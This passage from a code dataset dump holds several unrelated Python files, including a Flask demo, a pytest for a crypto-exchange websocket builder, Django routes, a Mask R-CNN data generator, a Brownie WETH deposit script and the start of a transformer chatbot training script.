analyze():\n usertext = request.args.get(\"usertext\")\n if usertext.lower() in s_name:\n ids = s_name.index(usertext.lower())\n result = json.dumps({'State': data.iloc[ids]['State'], 'Age-adjusted incidence rate (cases per 100k':data.iloc[ids]['Age-Adjusted Incidence Rate([rate note]) - cases per 100,000']})\n else:\n result = 'not valid'\n return render_template(\"analyze.html\", analysis=result, usertext=usertext)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True, port = 8007)\n","repo_name":"VIcKII-Z/Computational-Methods","sub_path":"Assignment5/fl_demo.py","file_name":"fl_demo.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"37782247580","text":"import pytest\n\nimport pybotters_wrapper as pbw\nfrom pybotters_wrapper.core import WebsocketRequest\n\n\n@pytest.fixture\ndef public_send() -> list[str]:\n return [\n '42[\"join-room\",\"ticker_btc_jpy\"]',\n '42[\"join-room\",\"transactions_btc_jpy\"]',\n '42[\"join-room\",\"depth_whole_btc_jpy\"]',\n '42[\"join-room\",\"depth_diff_btc_jpy\"]',\n ]\n\n\ndef test_public(public_send):\n expected = [\n WebsocketRequest(\n \"wss://stream.bitbank.cc/socket.io/?EIO=2&transport=websocket\",\n public_send,\n )\n ]\n\n actual = (\n pbw.create_factory(\"bitbank\")\n .create_websocket_request_builder()\n .subscribe(\"public\", symbol=\"btc_jpy\")\n .get()\n )\n\n assert expected == actual\n\n\n@pytest.mark.asyncio\nasync def test_private():\n with pytest.raises(NotImplementedError):\n (\n pbw.create_factory(\"bitbank\")\n .create_websocket_request_builder()\n .subscribe(\"private\", symbol=\"btc_jpy\")\n .get()\n )\n\n\n@pytest.mark.asyncio\nasync def test_all():\n with pytest.raises(NotImplementedError):\n (\n pbw.create_factory(\"bitbank\")\n .create_websocket_request_builder()\n .subscribe(\"all\", symbol=\"btc_jpy\")\n .get()\n )\n","repo_name":"ko0hi/pybotters-wrapper","sub_path":"tests/bitbank/test_websocket_request_builder.py","file_name":"test_websocket_request_builder.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"27"} +{"seq_id":"4489699485","text":"from cs50 import get_int\n\n\ndef main():\n height = get_positive_int(\"Height: \")\n\n for i in range(height):\n j = height-1\n counter = 0\n while j >= 0:\n if i < j:\n print(\" \", end=\"\")\n else:\n print(\"#\", end=\"\")\n counter += 1\n\n j -= 1\n\n print(\" \", end=\"\")\n\n k = 0\n while k < counter:\n print(\"#\", end=\"\")\n k += 1\n\n print()\n\n\ndef get_positive_int(message):\n while True:\n value = get_int(message)\n if value > 0 and value < 9:\n break\n\n return value\n\n\nmain()\n","repo_name":"gabrielgoncalveso/cs50_exercises","sub_path":"pset6/mario/more/mario.py","file_name":"mario.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"41283982169","text":"import matplotlib.pyplot as plt\n# %matplotlib inline\n\n# 그래프 데이터 \nsubject = ['English', 'Math', 'Korean', 'Science', 'Computer']\npoints = [40, 90, 50, 60, 100]\n\n# 축 그리기\nfig = plt.figure()\nax1 = fig.add_subplot(1,1,1)\n\n# 그래프 그리기\nax1.bar(subject, points)\n\n# 라벨, 타이틀 달기\nplt.xlabel('Subject')\nplt.ylabel('Points')\nplt.title(\"Yuna's Test Result\")\n\n# 보여주기\nplt.savefig('./barplot.png') # 그래프를 이미지로 출력\nplt.show() # 그래프를 화면으로 출력","repo_name":"leetaehwan/Workspace","sub_path":"Aiffel course/matplotlib_training.py","file_name":"matplotlib_training.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"3683630124","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.contrib.auth import views as auth_views\nimport maynardlabs.views as views\n\nurlpatterns = [\n # Examples:\n url(r'^$', views.index),\n url(r'home/', views.index),\n # url(r'^blog/', include('blog.urls')),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^blog/', views.blog),\n url(r'^podcasts/', views.podcast),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^members/login', auth_views.login, {'template_name': 'registration/login.html'}, name='login'),\n url(r'^members/logout', auth_views.logout, {'next_page': '/'}, name='logout'),\n url(r'^members/manageprofile', views.profile),\n url(r'^ckeditor/', include('ckeditor_uploader.urls')),\n url(r'^blogview/', views.blogview),\n]\n","repo_name":"jacobmaynard/maynardlabs","sub_path":"maynardlabs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71122758473","text":"import numpy as np\nimport logging\nimport skimage\nimport random\nfrom Utils.network_utils import compose_image_meta, compute_backbone_shapes\nfrom Utils.utils import resize_mask, resize_image, extract_bboxes, minimize_mask, generate_pyramid_anchors\nfrom model.Rpn import build_rpn_targets\nfrom model.Detection import build_detection_targets\n\ndef mold_image(images, config):\n \"\"\"Expects an RGB image (or array of images) and subtracts\n the mean pixel and converts it to float. Expects image\n colors in RGB order.\n \"\"\"\n return images.astype(np.float32) - config.MEAN_PIXEL\n\nclass Dataset(object):\n \"\"\"The base class for dataset classes.\n To use it, create a new class that adds functions specific to the dataset\n you want to use. For example:\n\n class CatsAndDogsDataset(Dataset):\n def load_cats_and_dogs(self):\n ...\n def load_mask(self, image_id):\n ...\n def image_reference(self, image_id):\n ...\n\n See COCODataset and ShapesDataset as examples.\n \"\"\"\n\n def __init__(self, class_map=None):\n self._image_ids = []\n self.image_info = []\n # Background is always the first class\n self.class_info = [{\"source\": \"\", \"id\": 0, \"name\": \"BG\"}]\n self.source_class_ids = {}\n\n def add_class(self, source, class_id, class_name):\n assert \".\" not in source, \"Source name cannot contain a dot\"\n # Does the class exist already?\n for info in self.class_info:\n if info['source'] == source and info[\"id\"] == class_id:\n # source.class_id combination already available, skip\n return\n # Add the class\n self.class_info.append({\n \"source\": source,\n \"id\": class_id,\n \"name\": class_name,\n })\n\n def add_image(self, source, image_id, path, **kwargs):\n image_info = {\n \"id\": image_id,\n \"source\": source,\n \"path\": path,\n }\n image_info.update(kwargs)\n self.image_info.append(image_info)\n\n def image_reference(self, image_id):\n \"\"\"Return a link to the image in its source Website or details about\n the image that help looking it up or debugging it.\n\n Override for your dataset, but pass to this function\n if you encounter images not in your dataset.\n \"\"\"\n return \"\"\n\n def prepare(self, class_map=None):\n \"\"\"Prepares the Dataset class for use.\n\n TODO: class map is not supported yet. When done, it should handle mapping\n classes from different datasets to the same class ID.\n \"\"\"\n\n def clean_name(name):\n \"\"\"Returns a shorter version of object names for cleaner display.\"\"\"\n return \",\".join(name.split(\",\")[:1])\n\n # Build (or rebuild) everything else from the info dicts.\n self.num_classes = len(self.class_info)\n self.class_ids = np.arange(self.num_classes)\n self.class_names = [clean_name(c[\"name\"]) for c in self.class_info]\n self.num_images = len(self.image_info)\n self._image_ids = np.arange(self.num_images)\n\n # Mapping from source class and image IDs to internal IDs\n self.class_from_source_map = {\"{}.{}\".format(info['source'], info['id']): id\n for info, id in zip(self.class_info, self.class_ids)}\n self.image_from_source_map = {\"{}.{}\".format(info['source'], info['id']): id\n for info, id in zip(self.image_info, self.image_ids)}\n\n # Map sources to class_ids they support\n self.sources = list(set([i['source'] for i in self.class_info]))\n self.source_class_ids = {}\n # Loop over datasets\n for source in self.sources:\n self.source_class_ids[source] = []\n # Find classes that belong to this dataset\n for i, info in enumerate(self.class_info):\n # Include BG class in all datasets\n if i == 0 or source == info['source']:\n self.source_class_ids[source].append(i)\n\n def map_source_class_id(self, source_class_id):\n \"\"\"Takes a source class ID and returns the int class ID assigned to it.\n\n For example:\n dataset.map_source_class_id(\"coco.12\") -> 23\n \"\"\"\n return self.class_from_source_map[source_class_id]\n\n def get_source_class_id(self, class_id, source):\n \"\"\"Map an internal class ID to the corresponding class ID in the source dataset.\"\"\"\n info = self.class_info[class_id]\n assert info['source'] == source\n return info['id']\n\n @property\n def image_ids(self):\n return self._image_ids\n\n def source_image_link(self, image_id):\n \"\"\"Returns the path or URL to the image.\n Override this to return a URL to the image if it's available online for easy\n debugging.\n \"\"\"\n return self.image_info[image_id][\"path\"]\n\n def load_image(self, image_id):\n \"\"\"Load the specified image and return a [H,W,3] Numpy array.\n \"\"\"\n # Load image\n image = skimage.io.imread(self.image_info[image_id]['path'])\n # If grayscale. Convert to RGB for consistency.\n if image.ndim != 3:\n image = skimage.color.gray2rgb(image)\n # If has an alpha channel, remove it for consistency\n if image.shape[-1] == 4:\n image = image[..., :3]\n return image\n\n def load_mask(self, image_id):\n \"\"\"Load instance masks for the given image.\n\n Different datasets use different ways to store masks. Override this\n method to load instance masks and return them in the form of am\n array of binary masks of shape [height, width, instances].\n\n Returns:\n masks: A bool array of shape [height, width, instance count] with\n a binary mask per instance.\n class_ids: a 1D array of class IDs of the instance masks.\n \"\"\"\n # Override this function to load a mask from your dataset.\n # Otherwise, it returns an empty mask.\n logging.warning(\"You are using the default load_mask(), maybe you need to define your own one.\")\n mask = np.empty([0, 0, 0])\n class_ids = np.empty([0], np.int32)\n return mask, class_ids\n\ndef load_image_gt(dataset, config, image_id, augment=False, augmentation=None, use_mini_mask=False):\n \"\"\"Load and return ground truth data for an image (image, mask, bounding boxes).\n\n augment: (deprecated. Use augmentation instead). If true, apply random\n image augmentation. Currently, only horizontal flipping is offered.\n augmentation: Optional. An imgaug (https://github.com/aleju/imgaug) augmentation.\n For example, passing imgaug.augmenters.Fliplr(0.5) flips images\n right/left 50% of the time.\n use_mini_mask: If False, returns full-size masks that are the same height\n and width as the original image. These can be big, for example\n 1024x1024x100 (for 100 instances). Mini masks are smaller, typically,\n 224x224 and are generated by extracting the bounding box of the\n object and resizing it to MINI_MASK_SHAPE.\n\n Returns:\n image: [height, width, 3]\n shape: the original shape of the image before resizing and cropping.\n class_ids: [instance_count] Integer class IDs\n bbox: [instance_count, (y1, x1, y2, x2)]\n mask: [height, width, instance_count]. The height and width are those\n of the image unless use_mini_mask is True, in which case they are\n defined in MINI_MASK_SHAPE.\n \"\"\"\n # Load image and mask\n image = dataset.load_image(image_id)\n mask, class_ids = dataset.load_mask(image_id)\n\n original_shape = image.shape\n image, window, scale, padding, crop = resize_image(\n image,\n min_dim=config.IMAGE_MIN_DIM,\n min_scale=config.IMAGE_MIN_SCALE,\n max_dim=config.IMAGE_MAX_DIM,\n mode=config.IMAGE_RESIZE_MODE)\n mask = resize_mask(mask, scale, padding, crop)\n\n if augment:\n logging.warning(\"'augment' is deprecated. Use 'augmentation' instead.\")\n if random.randint(0, 1):\n image = np.fliplr(image)\n mask = np.fliplr(mask)\n\n # Augmentation\n # This requires the imgaug lib (https://github.com/aleju/imgaug)\n if augmentation:\n import imgaug\n\n # Augmenters that are safe to apply to masks\n # Some, such as Affine, have settings that make them unsafe, so always\n # test your augmentation on masks\n MASK_AUGMENTERS = [\"Sequential\", \"SomeOf\", \"OneOf\", \"Sometimes\",\n \"Fliplr\", \"Flipud\", \"CropAndPad\",\n \"Affine\", \"PiecewiseAffine\"]\n\n def hook(images, augmenter, parents, default):\n \"\"\"Determines which augmenters to apply to masks.\"\"\"\n return augmenter.__class__.__name__ in MASK_AUGMENTERS\n\n # Store shapes before augmentation to compare\n image_shape = image.shape\n mask_shape = mask.shape\n # Make augmenters deterministic to apply similarly to images and masks\n det = augmentation.to_deterministic()\n image = det.augment_image(image)\n # Change mask to np.uint8 because imgaug doesn't support np.bool\n mask = det.augment_image(mask.astype(np.uint8), hooks=imgaug.HooksImages(activator=hook))\n\n # Verify that shapes didn't change\n assert image.shape == image_shape, \"Augmentation shouldn't change image size\"\n assert mask.shape == mask_shape, \"Augmentation shouldn't change mask size\"\n # Change mask back to bool\n mask = mask.astype(np.bool)\n\n # Note that some boxes might be all zeros if the corresponding mask got cropped out.\n # and here is to filter them out\n _idx = np.sum(mask, axis=(0, 1)) > 0\n mask = mask[:, :, _idx]\n class_ids = class_ids[_idx]\n # Bounding boxes. Note that some boxes might be all zeros\n # if the corresponding mask got cropped out.\n # bbox: [num_instances, (y1, x1, y2, x2)]\n bbox = extract_bboxes(mask)\n\n # Active classes\n # Different datasets have different classes, so track the\n # classes supported in the dataset of this image.\n active_class_ids = np.zeros([dataset.num_classes], dtype=np.int32)\n source_class_ids = dataset.source_class_ids[dataset.image_info[image_id][\"source\"]]\n active_class_ids[source_class_ids] = 1\n\n # Resize masks to smaller size to reduce memory usage\n if use_mini_mask:\n mask = minimize_mask(bbox, mask, config.MINI_MASK_SHAPE)\n\n # Image meta data\n image_meta = compose_image_meta(image_id, original_shape, image.shape, window, scale, active_class_ids)\n\n return image, image_meta, class_ids, bbox, mask\n\ndef data_generator(dataset, config, shuffle=True, augment=False, augmentation=None,\n random_rois=0, batch_size=1, detection_targets=False,\n no_augmentation_sources=None):\n \"\"\"A generator that returns images and corresponding target class ids,\n bounding box deltas, and masks.\n\n dataset: The Dataset object to pick data from\n config: The model config object\n shuffle: If True, shuffles the samples before every epoch\n augment: (deprecated. Use augmentation instead). If true, apply random\n image augmentation. Currently, only horizontal flipping is offered.\n augmentation: Optional. An imgaug (https://github.com/aleju/imgaug) augmentation.\n For example, passing imgaug.augmenters.Fliplr(0.5) flips images\n right/left 50% of the time.\n random_rois: If > 0 then generate proposals to be used to train the\n network classifier and mask heads. Useful if training\n the Mask RCNN part without the RPN.\n batch_size: How many images to return in each call\n detection_targets: If True, generate detection targets (class IDs, bbox\n deltas, and masks). Typically for debugging or visualizations because\n in trainig detection targets are generated by DetectionTargetLayer.\n no_augmentation_sources: Optional. List of sources to exclude for\n augmentation. A source is string that identifies a dataset and is\n defined in the Dataset class.\n\n Returns a Python generator. Upon calling next() on it, the\n generator returns two lists, inputs and outputs. The contents\n of the lists differs depending on the received arguments:\n inputs list:\n - images: [batch, H, W, C]\n - image_meta: [batch, (meta data)] Image details. See compose_image_meta()\n - rpn_match: [batch, N] Integer (1=positive anchor, -1=negative, 0=neutral)\n - rpn_bbox: [batch, N, (dy, dx, log(dh), log(dw))] Anchor bbox deltas.\n - gt_class_ids: [batch, MAX_GT_INSTANCES] Integer class IDs\n - gt_boxes: [batch, MAX_GT_INSTANCES, (y1, x1, y2, x2)]\n - gt_masks: [batch, height, width, MAX_GT_INSTANCES]. The height and width\n are those of the image unless use_mini_mask is True, in which\n case they are defined in MINI_MASK_SHAPE.\n\n outputs list: Usually empty in regular training. But if detection_targets\n is True then the outputs list contains target class_ids, bbox deltas,\n and masks.\n \"\"\"\n b = 0 # batch item index\n image_index = -1\n image_ids = np.copy(dataset.image_ids)\n error_count = 0\n no_augmentation_sources = no_augmentation_sources or []\n\n # Anchors\n # [anchor_count, (y1, x1, y2, x2)]\n backbone_shapes = compute_backbone_shapes(config, config.IMAGE_SHAPE)\n anchors = generate_pyramid_anchors(config.RPN_ANCHOR_SCALES,\n config.RPN_ANCHOR_RATIOS,\n backbone_shapes,\n config.BACKBONE_STRIDES,\n config.RPN_ANCHOR_STRIDE)\n\n # Keras requires a generator to run indefinitely.\n while True:\n try:\n # Increment index to pick next image. Shuffle if at the start of an epoch.\n image_index = (image_index + 1) % len(image_ids)\n if shuffle and image_index == 0:\n np.random.shuffle(image_ids)\n\n # Get GT bounding boxes and masks for image.\n image_id = image_ids[image_index]\n\n # If the image source is not to be augmented pass None as augmentation\n if dataset.image_info[image_id]['source'] in no_augmentation_sources:\n image, image_meta, gt_class_ids, gt_boxes, gt_masks = load_image_gt(dataset, config, image_id,\n augment=augment,\n augmentation=None,\n use_mini_mask=config.USE_MINI_MASK)\n else:\n image, image_meta, gt_class_ids, gt_boxes, gt_masks = load_image_gt(dataset, config, image_id,\n augment=augment,\n augmentation=augmentation,\n use_mini_mask=config.USE_MINI_MASK)\n\n # Skip images that have no instances. This can happen in cases\n # where we train on a subset of classes and the image doesn't\n # have any of the classes we care about.\n if not np.any(gt_class_ids > 0):\n continue\n\n # RPN Targets\n rpn_match, rpn_bbox = build_rpn_targets(image.shape, anchors, gt_class_ids, gt_boxes, config)\n\n # Mask R-CNN Targets\n if random_rois:\n rpn_rois = generate_random_rois(image.shape, random_rois, gt_class_ids, gt_boxes)\n if detection_targets:\n rois, mrcnn_class_ids, mrcnn_bbox, mrcnn_mask = build_detection_targets(\n rpn_rois, gt_class_ids, gt_boxes, gt_masks, config)\n\n # Init batch arrays\n if b == 0:\n batch_image_meta = np.zeros((batch_size,) + image_meta.shape, dtype=image_meta.dtype)\n batch_rpn_match = np.zeros([batch_size, anchors.shape[0], 1], dtype=rpn_match.dtype)\n batch_rpn_bbox = np.zeros([batch_size, config.RPN_TRAIN_ANCHORS_PER_IMAGE, 4], dtype=rpn_bbox.dtype)\n batch_images = np.zeros((batch_size,) + image.shape, dtype=np.float32)\n batch_gt_class_ids = np.zeros((batch_size, config.MAX_GT_INSTANCES), dtype=np.int32)\n batch_gt_boxes = np.zeros((batch_size, config.MAX_GT_INSTANCES, 4), dtype=np.int32)\n batch_gt_masks = np.zeros((batch_size, gt_masks.shape[0], gt_masks.shape[1],\n config.MAX_GT_INSTANCES), dtype=gt_masks.dtype)\n if random_rois:\n batch_rpn_rois = np.zeros((batch_size, rpn_rois.shape[0], 4), dtype=rpn_rois.dtype)\n if detection_targets:\n batch_rois = np.zeros((batch_size,) + rois.shape, dtype=rois.dtype)\n batch_mrcnn_class_ids = np.zeros((batch_size,) + mrcnn_class_ids.shape, dtype=mrcnn_class_ids.dtype)\n batch_mrcnn_bbox = np.zeros((batch_size,) + mrcnn_bbox.shape, dtype=mrcnn_bbox.dtype)\n batch_mrcnn_mask = np.zeros((batch_size,) + mrcnn_mask.shape, dtype=mrcnn_mask.dtype)\n\n # If more instances than fits in the array, sub-sample from them.\n if gt_boxes.shape[0] > config.MAX_GT_INSTANCES:\n ids = np.random.choice(np.arange(gt_boxes.shape[0]), config.MAX_GT_INSTANCES, replace=False)\n gt_class_ids = gt_class_ids[ids]\n gt_boxes = gt_boxes[ids]\n gt_masks = gt_masks[:, :, ids]\n\n # Add to batch\n batch_image_meta[b] = image_meta\n batch_rpn_match[b] = rpn_match[:, np.newaxis]\n batch_rpn_bbox[b] = rpn_bbox\n batch_images[b] = mold_image(image.astype(np.float32), config)\n batch_gt_class_ids[b, :gt_class_ids.shape[0]] = gt_class_ids\n batch_gt_boxes[b, :gt_boxes.shape[0]] = gt_boxes\n batch_gt_masks[b, :, :, :gt_masks.shape[-1]] = gt_masks\n if random_rois:\n batch_rpn_rois[b] = rpn_rois\n if detection_targets:\n batch_rois[b] = rois\n batch_mrcnn_class_ids[b] = mrcnn_class_ids\n batch_mrcnn_bbox[b] = mrcnn_bbox\n batch_mrcnn_mask[b] = mrcnn_mask\n b += 1\n\n # Batch full?\n if b >= batch_size:\n inputs = [batch_images, batch_image_meta, batch_rpn_match, batch_rpn_bbox,\n batch_gt_class_ids, batch_gt_boxes, batch_gt_masks]\n outputs = []\n\n if random_rois:\n inputs.extend([batch_rpn_rois])\n if detection_targets:\n inputs.extend([batch_rois])\n # Keras requires that output and targets have the same number of dimensions\n batch_mrcnn_class_ids = np.expand_dims(batch_mrcnn_class_ids, -1)\n outputs.extend([batch_mrcnn_class_ids, batch_mrcnn_bbox, batch_mrcnn_mask])\n\n yield inputs, outputs\n\n # start a new batch\n b = 0\n except (GeneratorExit, KeyboardInterrupt):\n raise\n except:\n # Log it and skip the image\n logging.exception(\"Error processing image {}\".format(dataset.image_info[image_id]))\n error_count += 1\n if error_count > 5:\n raise\n\ndef generate_random_rois(image_shape, count, gt_class_ids, gt_boxes):\n \"\"\"Generates ROI proposals similar to what a region proposal network would generate.\n\n image_shape: [Height, Width, Depth]\n count: Number of ROIs to generate\n gt_class_ids: [N] Integer ground truth class IDs\n gt_boxes: [N, (y1, x1, y2, x2)] Ground truth boxes in pixels.\n\n Returns: [count, (y1, x1, y2, x2)] ROI boxes in pixels.\n \"\"\"\n # placeholder\n rois = np.zeros((count, 4), dtype=np.int32)\n\n # Generate random ROIs around GT boxes (90% of count)\n rois_per_box = int(0.9 * count / gt_boxes.shape[0])\n for i in range(gt_boxes.shape[0]):\n gt_y1, gt_x1, gt_y2, gt_x2 = gt_boxes[i]\n h = gt_y2 - gt_y1\n w = gt_x2 - gt_x1\n # random boundaries\n r_y1 = max(gt_y1 - h, 0)\n r_y2 = min(gt_y2 + h, image_shape[0])\n r_x1 = max(gt_x1 - w, 0)\n r_x2 = min(gt_x2 + w, image_shape[1])\n\n # To avoid generating boxes with zero area, we generate double what\n # we need and filter out the extra. If we get fewer valid boxes\n # than we need, we loop and try again.\n while True:\n y1y2 = np.random.randint(r_y1, r_y2, (rois_per_box * 2, 2))\n x1x2 = np.random.randint(r_x1, r_x2, (rois_per_box * 2, 2))\n # Filter out zero area boxes\n threshold = 1\n y1y2 = y1y2[np.abs(y1y2[:, 0] - y1y2[:, 1]) >= threshold][:rois_per_box]\n x1x2 = x1x2[np.abs(x1x2[:, 0] - x1x2[:, 1]) >= threshold][:rois_per_box]\n if y1y2.shape[0] == rois_per_box and x1x2.shape[0] == rois_per_box:\n break\n\n # Sort on axis 1 to ensure x1 <= x2 and y1 <= y2 and then reshape\n # into x1, y1, x2, y2 order\n x1, x2 = np.split(np.sort(x1x2, axis=1), 2, axis=1)\n y1, y2 = np.split(np.sort(y1y2, axis=1), 2, axis=1)\n box_rois = np.hstack([y1, x1, y2, x2])\n rois[rois_per_box * i:rois_per_box * (i + 1)] = box_rois\n\n # Generate random ROIs anywhere in the image (10% of count)\n remaining_count = count - (rois_per_box * gt_boxes.shape[0])\n # To avoid generating boxes with zero area, we generate double what\n # we need and filter out the extra. If we get fewer valid boxes\n # than we need, we loop and try again.\n while True:\n y1y2 = np.random.randint(0, image_shape[0], (remaining_count * 2, 2))\n x1x2 = np.random.randint(0, image_shape[1], (remaining_count * 2, 2))\n # Filter out zero area boxes\n threshold = 1\n y1y2 = y1y2[np.abs(y1y2[:, 0] - y1y2[:, 1]) >= threshold][:remaining_count]\n x1x2 = x1x2[np.abs(x1x2[:, 0] - x1x2[:, 1]) >= threshold][:remaining_count]\n if y1y2.shape[0] == remaining_count and x1x2.shape[0] == remaining_count:\n break\n\n # Sort on axis 1 to ensure x1 <= x2 and y1 <= y2 and then reshape\n # into x1, y1, x2, y2 order\n x1, x2 = np.split(np.sort(x1x2, axis=1), 2, axis=1)\n y1, y2 = np.split(np.sort(y1y2, axis=1), 2, axis=1)\n global_rois = np.hstack([y1, x1, y2, x2])\n rois[-remaining_count:] = global_rois\n return rois\n\nif __name__ == '__main__':\n from data.CustomDataset import ShapesDataset\n from Config.CustomConfig import ShapesConfig\n import numpy as np\n from Utils.network_utils import parse_image_meta_graph\n\n config = ShapesConfig()\n\n dataset_train = ShapesDataset()\n dataset_train.load_shapes(500, config.IMAGE_SHAPE[0], config.IMAGE_SHAPE[1])\n dataset_train.prepare()\n\n image, image_meta, gt_class_ids, gt_boxes, gt_masks = load_image_gt(dataset_train, config, 0,\n augment=False,\n augmentation=None,\n use_mini_mask=True)\n\n print(parse_image_meta_graph(np.array([image_meta])))\n\n # train_generator = data_generator(dataset_train, config, shuffle=True,\n # augmentation=None,\n # batch_size=config.BATCH_SIZE,\n # no_augmentation_sources=None)\n # input, output = next(train_generator)\n # print(len(input), len(output))\n","repo_name":"bladesaber/maskrcnn","sub_path":"data/DataGenerator.py","file_name":"DataGenerator.py","file_ext":"py","file_size_in_byte":24152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"38311475573","text":"from scripts.helpfulFunctions import getAccount\nfrom brownie import interface, config, network\n\n\ndef main():\n getWETH()\n\n\ndef getWETH():\n \"\"\"\"\"\n Mints WETH by depositing ETH.\n \"\"\" \"\"\n account = getAccount()\n weth = interface.IWeth(config[\"networks\"][network.show_active()][\"weth_erc20\"])\n tranx = weth.deposit({\"from\": account, \"value\": 0.1 * (10 ** 18)})\n tranx.wait(1)\n print(f\"Received 0.1 WETH\")\n return tranx\n","repo_name":"SyncCode2017/AAVE_INTERACT_BROWNIE.PY","sub_path":"scripts/getWETH.py","file_name":"getWETH.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"21453428497","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport tensorflow as tf\ntf.random.set_seed(1234)\n\nimport tensorflow_datasets as tfds\n\nimport os\nimport re\nimport sys\nimport numpy as np\n\n\"\"\"##Prepare Dataset\n\nWe will use the conversations in movies and TV shows provided by [Cornell Movie-Dialogs Corpus](https://www.cs.cornell.edu/~cristian/Cornell_Movie-Dialogs_Corpus.html), which contains more than 220 thousands conversational exchanges between more than 10k pairs of movie characters, as our dataset.\n\n`movie_conversations.txt` contains list of the conversation IDs and `movie_lines.text` contains the text of assoicated with each conversation ID. For further information regarding the dataset, please check the README file in the zip file.\n\"\"\"\n\ndata_name = \"trump\"\nnew_training = True\nVALIDATION_SIZE = 20\nEPOCHS = 80\nMAX_LENGTH = 100\n\npath_to_training_data = 'model_training/trump_response_pairs.txt'\n\n\"\"\"### Load and preprocess data\n\nTo keep this example simple and fast, we are limiting the maximum number of training samples to`MAX_SAMPLES=25000` and the maximum length of the sentence to be `MAX_LENGTH=40`.\n\nWe preprocess our dataset in the following order:\n* Extract `MAX_SAMPLES` conversation pairs into list of `questions` and `answers.\n* Preprocess each sentence by removing special characters in each sentence.\n* Build tokenizer (map text to ID and ID to text) using [TensorFlow Datasets SubwordTextEncoder](https://www.tensorflow.org/datasets/api_docs/python/tfds/features/text/SubwordTextEncoder).\n* Tokenize each sentence and add `START_TOKEN` and `END_TOKEN` to indicate the start and end of each sentence.\n* Filter out sentence that has more than `MAX_LENGTH` tokens.\n* Pad tokenized sentences to `MAX_LENGTH`\n\"\"\"\n\n# Maximum number of samples to preprocess, currently not being used\n# MAX_SAMPLES = 50000\n\ndef preprocess_sentence(sentence):\n sentence = sentence.lower().strip()\n # creating a space between a word and the punctuation following it\n # eg: \"he is a boy.\" => \"he is a boy .\"\n sentence = re.sub(r\"([?.!,])\", r\" \\1 \", sentence)\n sentence = re.sub(r'[\" \"]+', \" \", sentence)\n # replacing everything with space except (a-z, A-Z, \".\", \"?\", \"!\", \",\")\n sentence = re.sub(r\"[^a-zA-Z?.!,]+\", \" \", sentence)\n sentence = sentence.strip()\n # adding a start and an end token to the sentence\n return sentence\n\n\ndef load_conversations():\n # dictionary of line id to text\n inputs, outputs = [], []\n with open(path_to_training_data) as f:\n line = f.readline()\n while line:\n inputs.append(preprocess_sentence(line))\n line = f.readline()\n outputs.append(preprocess_sentence(line))\n line = f.readline()\n \n return inputs, outputs\n\nprint(\"Loading, preprocessing, and tokenizing training data.\")\n\nquestions, answers = load_conversations()\n\n#print('Sample question: {}'.format(questions[20]))\n#print('Sample answer: {}'.format(answers[20]))\n\n# Build tokenizer using tfds for both questions and answers\ntokenizer = tfds.features.text.SubwordTextEncoder.build_from_corpus(\n questions + answers, target_vocab_size=2**13)\n\n# Define start and end token to indicate the start and end of a sentence\nSTART_TOKEN, END_TOKEN = [tokenizer.vocab_size], [tokenizer.vocab_size + 1]\n\n# Vocabulary size plus start and end token\nVOCAB_SIZE = tokenizer.vocab_size + 2\n\n#print('Tokenized sample question: {}'.format(tokenizer.encode(questions[20])))\n\n\n# Tokenize, filter and pad sentences\ndef tokenize_and_filter(inputs, outputs):\n tokenized_inputs, tokenized_outputs = [], []\n \n for (sentence1, sentence2) in zip(inputs, outputs):\n # tokenize sentence\n sentence1 = START_TOKEN + tokenizer.encode(sentence1) + END_TOKEN\n sentence2 = START_TOKEN + tokenizer.encode(sentence2) + END_TOKEN\n # check tokenized sentence max length\n if len(sentence1) <= MAX_LENGTH and len(sentence2) <= MAX_LENGTH:\n tokenized_inputs.append(sentence1)\n tokenized_outputs.append(sentence2)\n \n # pad tokenized sentences\n tokenized_inputs = tf.keras.preprocessing.sequence.pad_sequences(\n tokenized_inputs, maxlen=MAX_LENGTH, padding='post')\n tokenized_outputs = tf.keras.preprocessing.sequence.pad_sequences(\n tokenized_outputs, maxlen=MAX_LENGTH, padding='post')\n \n return tokenized_inputs, tokenized_outputs\n\n\nquestions, answers = tokenize_and_filter(questions, answers)\n\n#print('Vocab size: {}'.format(VOCAB_SIZE))\n#print('Number of samples: {}'.format(len(questions)))\n\n\"\"\"### Create `tf.data.Dataset`\n\nWe are going to use the [tf.data.Dataset API](https://www.tensorflow.org/api_docs/python/tf/data) to contruct our input pipline in order to utilize features like caching and prefetching to speed up the training process.\n\nThe transformer is an auto-regressive model: it makes predictions one part at a time, and uses its output so far to decide what to do next.\n\nDuring training this example uses teacher-forcing. Teacher forcing is passing the true output to the next time step regardless of what the model predicts at the current time step.\n\nAs the transformer predicts each word, self-attention allows it to look at the previous words in the input sequence to better predict the next word.\n\nTo prevent the model from peaking at the expected output the model uses a look-ahead mask.\n\nTarget is divided into `decoder_inputs` which padded as an input to the decoder and `cropped_targets` for calculating our loss and accuracy.\n\"\"\"\n\nBATCH_SIZE = 64\nBUFFER_SIZE = 20000\n\n# decoder inputs use the previous target as input\n# remove START_TOKEN from targets\ndataset = tf.data.Dataset.from_tensor_slices((\n {\n 'inputs': questions,\n 'dec_inputs': answers[:, :-1]\n },\n {\n 'outputs': answers[:, 1:]\n },\n))\n\ndataset = dataset.cache()\ndataset = dataset.shuffle(BUFFER_SIZE)\ndataset = dataset.batch(BATCH_SIZE)\ndataset = 